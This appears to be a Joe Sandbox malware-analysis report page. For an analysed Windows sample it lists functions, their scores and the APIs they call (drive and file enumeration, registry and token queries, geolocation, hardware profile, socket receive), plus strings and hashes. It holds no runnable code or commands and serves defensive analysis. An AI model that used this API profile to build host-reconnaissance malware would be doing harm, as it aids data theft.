Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID:
String ID: exists$ios_base::badbit set
API String ID: 0-2074760687
Opcode ID: 62f4f3782a67655195f75cc23645e5968d505c7b1924aa791427a6a2ed6b9989
Instruction ID: e206d8204e2f17baab896962e6dda16a529427de871d1027cc906b675256a22c
Opcode Fuzzy Hash: 62f4f3782a67655195f75cc23645e5968d505c7b1924aa791427a6a2ed6b9989
Instruction Fuzzy Hash: 0EF12E72A1DAC691EF20DB14E8D43EEA360FB84784F404232DA8DC6A9ADF7CD545CB41

Function 00007FF621847AA0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6218973F0: GetLogicalDriveStringsW.KERNEL32 ref: 00007FF621897461

Part of subcall function 00007FF621847AA0: FindFirstFileW.KERNEL32 ref: 00007FF621846E8F

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621847C0F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621847C15

Strings

filename, xrefs: 00007FF62184746A
content, xrefs: 00007FF62184755F

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$DriveFileFindFirstLogicalStrings
String ID: content$filename
API String ID: 3820383557-474635906
Opcode ID: 4b4e66b87f006d5df5f3bbf59c462ebb09687f67ade3d69b841ee6767036e351
Instruction ID: 90b366260dbb2fb73643c7477b5663ae1c44470ff20515769e9d316d6c69917c
Opcode Fuzzy Hash: 4b4e66b87f006d5df5f3bbf59c462ebb09687f67ade3d69b841ee6767036e351
Instruction Fuzzy Hash: 59418662F1C68141EF209B15E88026EA761EBC5BF4F185731EBADC7BDADE3CD1818605

Function 00007FF621858560 Relevance: 6.2, APIs: 4, Instructions: 192COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6218586A0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6218586A6
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF62185879F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6218587A5

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 73155330-0
Opcode ID: d4a7a193e713d0c0d3a182e268d338e18a0ef7fae1eea1240043fad13b671e27
Instruction ID: d84532436dc79b4998cd12b7ed925e99a234ef5723b43e0101ea0632f1596544
Opcode Fuzzy Hash: d4a7a193e713d0c0d3a182e268d338e18a0ef7fae1eea1240043fad13b671e27
Instruction Fuzzy Hash: 5F510B62B0D74295FF249B13AD843B96291EB05BE4F580632DE6ECB7C6DE3CE1918301

Function 00007FF62188F820 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF62188F85B
OpenProcessToken.ADVAPI32 ref: 00007FF62188F86E
GetTokenInformation.KERNELBASE ref: 00007FF62188F8AA
CloseHandle.KERNEL32 ref: 00007FF62188F8CB

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: ProcessToken$CloseCurrentHandleInformationOpen
String ID:
API String ID: 215268677-0
Opcode ID: 1c225c442ed3ae12c114120d81f2afce391d37106ff629cfd40a7a8c2f449ed4
Instruction ID: 4486f3cec43ac50783a7eeca325bc5a40f67766feaa148c9cfc813c9c899dca1
Opcode Fuzzy Hash: 1c225c442ed3ae12c114120d81f2afce391d37106ff629cfd40a7a8c2f449ed4
Instruction Fuzzy Hash: 19111932A1CB8586EB509F12F88035AB7A0FB88B84F559135EA9DC7B68CF3CD515CB41

Function 00007FF621851EB0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 153COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF62185209C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6218520A2

Strings

, xrefs: 00007FF621851F33

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 73155330-3916222277
Opcode ID: bd2126c6184ea418190369a91188356048ad19484ed78d6017cbc67749b12416
Instruction ID: 6f5a618b6def300470d26f3150e2f8aad427174d37d5e2c450fd66c60fa57534
Opcode Fuzzy Hash: bd2126c6184ea418190369a91188356048ad19484ed78d6017cbc67749b12416
Instruction Fuzzy Hash: F1516D72A09B45A6EF158F2AD89026C73A1FB44B94F554631CB5EC3BA5CF3DE0A1C301

Function 00007FF621896460 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45registryCOMMON

Download Yara Rule

APIs

RegGetValueA.KERNEL32 ref: 00007FF6218964C9

Strings

ProductName, xrefs: 00007FF6218964B4
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 00007FF6218964BB

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: Value
String ID: ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 3702945584-1787575317
Opcode ID: 2a86f52d21c0d317d845918c1eff150dd2af89f53095ac6f6b3145bfe1108998
Instruction ID: 76bab3fdc1dcfd9d4a82bc1d0846f1614b3592dd5600173f15c1595902ffa6a5
Opcode Fuzzy Hash: 2a86f52d21c0d317d845918c1eff150dd2af89f53095ac6f6b3145bfe1108998
Instruction Fuzzy Hash: 9111543290CB8186DB208F21F8513AAB3A4FB99788F504236EA9D87B59DF7CD155CB41

Function 00007FF621894DB7 Relevance: 4.7, APIs: 3, Instructions: 182networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 00007FF6218950EC
closesocket.WS2_32 ref: 00007FF6218950FE
WSACleanup.WS2_32 ref: 00007FF621895104
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62189521A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621895226
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62189522C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621895232

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Cleanupclosesocketrecv
String ID:
API String ID: 1729841683-0
Opcode ID: 2958c0dab5778adee80b205899659564e84d6b5d31d43a4cf879d8fadaae1012
Instruction ID: 67c0e3845af15b75eab3ef5ea7045f6a61fa910182b34de66008afc3f665bd28
Opcode Fuzzy Hash: 2958c0dab5778adee80b205899659564e84d6b5d31d43a4cf879d8fadaae1012
Instruction Fuzzy Hash: 97915663E1CBC541EF208B15E8943AE6751EB857A0F509331EAADC6BDADF7CD4808741

Function 00007FF62183E2A0 Relevance: 4.7, APIs: 3, Instructions: 175COMMON

Download Yara Rule

APIs

__std_fs_directory_iterator_open.LIBCPMT ref: 00007FF62183E3D3

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: __std_fs_directory_iterator_open
String ID:
API String ID: 4007087469-0
Opcode ID: fabda3440b3a970c6517012b6284bd965a7a17d99ef29a6ac24327a373e5ca68
Instruction ID: 9c41d0d70f61f835c9c8a530180a15c2f1c88a72b3f33acc422144a3af741158
Opcode Fuzzy Hash: fabda3440b3a970c6517012b6284bd965a7a17d99ef29a6ac24327a373e5ca68
Instruction Fuzzy Hash: 9961A163F1CA4289EF10DB65D8C03FD23A1AB487A8F244631EE1DD7AD5EE3CD4868241

Function 00007FF62188EED0 Relevance: 4.6, APIs: 3, Instructions: 87COMMON

Download Yara Rule

APIs

SHGetKnownFolderPath.SHELL32 ref: 00007FF62188EF29
CoTaskMemFree.OLE32 ref: 00007FF62188EFEA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62188F012

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: FolderFreeKnownPathTask_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2444108017-0
Opcode ID: 32518165674d7c465f22ef56904ffd5e9575b1eff28ae6fd90d27e7beb839bf3
Instruction ID: 1c98f354e0768f69b83136b48793a0c31a9ee4917f76d066b4e12b33aea48974
Opcode Fuzzy Hash: 32518165674d7c465f22ef56904ffd5e9575b1eff28ae6fd90d27e7beb839bf3
Instruction Fuzzy Hash: EA317962D1CB8582EB108F25E88026AB761FB997F4F205335FAAD82695DF7CD1818740

Function 00007FF621896E1B Relevance: 4.6, APIs: 3, Instructions: 68registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32 ref: 00007FF621896E37
RegQueryValueExA.KERNEL32 ref: 00007FF621896E76
RegCloseKey.ADVAPI32 ref: 00007FF621896F14

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 449b346300c6dfb40ad3cf76c852e55e5272eaacca4522850c5d45356a61db71
Instruction ID: b0eccdaaca257eed362867c3a5c391730e4e7c4fd0cffe4ea88a2360f340022e
Opcode Fuzzy Hash: 449b346300c6dfb40ad3cf76c852e55e5272eaacca4522850c5d45356a61db71
Instruction Fuzzy Hash: 0D218462A1CB8681EF50CB25E89036EB750EBD57D4F509232FA8EC2B99DE2CD184C741

Function 00007FF6218958D0 Relevance: 4.6, APIs: 3, Instructions: 50COMMON

Download Yara Rule

APIs

GetUserGeoID.KERNEL32 ref: 00007FF6218958F7
GetGeoInfoA.KERNEL32 ref: 00007FF621895911
GetGeoInfoA.KERNEL32 ref: 00007FF621895961

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: Info$User
String ID:
API String ID: 2017065092-0
Opcode ID: 877c1b4e073b3a87c3d7ac6068cbd316133fc0437c9f32c249d117db553f0db1
Instruction ID: 0f3c48a55eee4f48fc7ce916931c3e86abfce3e44632412c02f177974c9a972d
Opcode Fuzzy Hash: 877c1b4e073b3a87c3d7ac6068cbd316133fc0437c9f32c249d117db553f0db1
Instruction Fuzzy Hash: D1118E32A18B8182DB108F61E85071AB7A2FB80B88F045135EB8947B59DF7CD5908B45

Function 00007FF6218B4F60 Relevance: 4.5, APIs: 3, Instructions: 14COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF6218B4F5C), ref: 00007FF6218B4F71
TerminateProcess.KERNEL32(?,?,?,00007FF6218B4F5C), ref: 00007FF6218B4F7C
ExitProcess.KERNEL32 ref: 00007FF6218B4F8B

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 38c7b4f83e553420579c8e330882a64258dcf8d372290847a19fb81a50e45df1
Instruction ID: 88facff501298ce00ca4719b679d63a38005293b9d6ec09b19ef761301f88896
Opcode Fuzzy Hash: 38c7b4f83e553420579c8e330882a64258dcf8d372290847a19fb81a50e45df1
Instruction Fuzzy Hash: 1AD09218F0CB0292EF582F705CDA07C12A56FA9B01F81143CE80BC7393CD2DEA4D4202

Function 00007FF621896C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32 ref: 00007FF621896CAC

Strings

Unknown, xrefs: 00007FF621896D66

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: CurrentProfile
String ID: Unknown
API String ID: 2104809126-1654365787
Opcode ID: 7d1894d02ad829e9285e0b5a7518a9d59928f615f8cebd4b8bd65d2ac191d8cc
Instruction ID: f3173e7d6bd56c72529d1c5c7bab87e0ffd69f9e221dee8cc94607449c634aed
Opcode Fuzzy Hash: 7d1894d02ad829e9285e0b5a7518a9d59928f615f8cebd4b8bd65d2ac191d8cc
Instruction Fuzzy Hash: 6A31C323A2CBC186EB108F21E9502AAB760FB99744F545235FBCD82A46DF7CD695CB01

Function 00007FF62189C190 Relevance: 3.3, APIs: 2, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 952e7dea0455afed52ee2a9d2b3d2677d9356cefd2ef79eba93cb344390597d2
Instruction ID: 6794abed1519c7a0b5a59dd1736aeb6720ab0321db3a9443892e3362c921d1d8
Opcode Fuzzy Hash: 952e7dea0455afed52ee2a9d2b3d2677d9356cefd2ef79eba93cb344390597d2
Instruction Fuzzy Hash: 14A18D72A08B8586EB10CF25E8943AD77A0FB89B98F188135EB4D87799DF3DD581C740

Function 00007FF62189F150 Relevance: 3.2, APIs: 2, Instructions: 189COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62189F394
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF62189F3A0

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 73155330-0
Opcode ID: ba242b05462e5decd8a06ab9633786e5717a36be800c23a59c2f73be74018685
Instruction ID: 949f9653e4a1132b2eee758f63acaa6b93b9e0aae907bab3467957269a02d180
Opcode Fuzzy Hash: ba242b05462e5decd8a06ab9633786e5717a36be800c23a59c2f73be74018685
Instruction Fuzzy Hash: 6F61AB66B0CA4185EF189A56D9A437C2BA1AB04FD8F548531DE2DCB3D5DF3CE886D302

Function 00007FF62188D260 Relevance: 3.2, APIs: 2, Instructions: 162COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF62188D510: RegOpenKeyExA.KERNEL32 ref: 00007FF62188D561
Part of subcall function 00007FF62188D510: RegCloseKey.ADVAPI32 ref: 00007FF62188D573

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62188D4F8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62188D4FE

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CloseOpen
String ID:
API String ID: 3087652857-0
Opcode ID: 936f24d04adea84db975d37076171eb9653a9a83e6133b35e13dfc3a22ae9153
Instruction ID: 3299425a61b42d4ecabcb906f96c8de7abf0042fe6adc697a19fa0880b2195ca
Opcode Fuzzy Hash: 936f24d04adea84db975d37076171eb9653a9a83e6133b35e13dfc3a22ae9153
Instruction Fuzzy Hash: DE71B472A1CB8585EB20CB64E8803ED77A1FB89798F515235EA9D87B99DF3CD140C701

Function 00007FF621858E80 Relevance: 3.1, APIs: 2, Instructions: 129COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF621859015
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62185901B

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 73155330-0
Opcode ID: e5da5b1489ea0062d8195201122e3469871c118b98b40e10f123a9de37b4b89d
Instruction ID: 9e96df86f808d9a628a4ef07bc5877679ae97c15ba21510365d8db7ee6d68224
Opcode Fuzzy Hash: e5da5b1489ea0062d8195201122e3469871c118b98b40e10f123a9de37b4b89d
Instruction Fuzzy Hash: BC41AF62B0CB8195EF109F12A9842ADA752FB49BD4F580632DF6ECB78ADE3CD0419301

Function 00007FF621860790 Relevance: 3.1, APIs: 2, Instructions: 118COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6218608F4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621860900

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
